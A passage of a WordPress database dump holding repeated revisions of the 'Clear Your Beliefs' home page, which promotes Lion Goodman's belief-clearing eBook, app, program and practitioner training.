(1689, 2, '2014-11-12 01:44:00', '2014-11-12 06:44:00', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;padding-top:10px">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg">\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 01:44:00', '2014-11-12 06:44:00', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1690, 2, '2014-11-12 01:48:37', '2014-11-12 06:48:37', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;padding-top:10px;margin: 0px">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg">\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 01:48:37', '2014-11-12 06:48:37', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1692, 2, '2014-11-12 02:04:13', '2014-11-12 07:04:13', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top:10px; margin: 0px;">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 8px">Start Clearing Whatever Is In The Way Right Now!</p>\n\n \n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg">\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 02:04:13', '2014-11-12 07:04:13', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1691, 2, '2014-11-12 02:02:45', '2014-11-12 07:02:45', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top:10px; margin: 0px;">Download the free eBook.</p>\n\n<p>Free App</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></p><p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p><p style="text-align: center;font-size: 14px;margin-bottom: 8px">Start Clearing Whatever Is In The Way Right Now!</p><p>  </p><p></p>Complete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg">\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 02:02:45', '2014-11-12 07:02:45', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1693, 2, '2014-11-12 02:05:15', '2014-11-12 07:05:15', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top:10px; margin: 0px;">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 8px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg">\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 02:05:15', '2014-11-12 07:05:15', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1694, 2, '2014-11-12 02:33:49', '2014-11-12 07:33:49', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top:10px; margin: 0px;">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg">\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 02:33:49', '2014-11-12 07:33:49', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1695, 2, '2014-11-12 02:38:03', '2014-11-12 07:38:03', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top:10px; margin: 0px;">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg">\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – 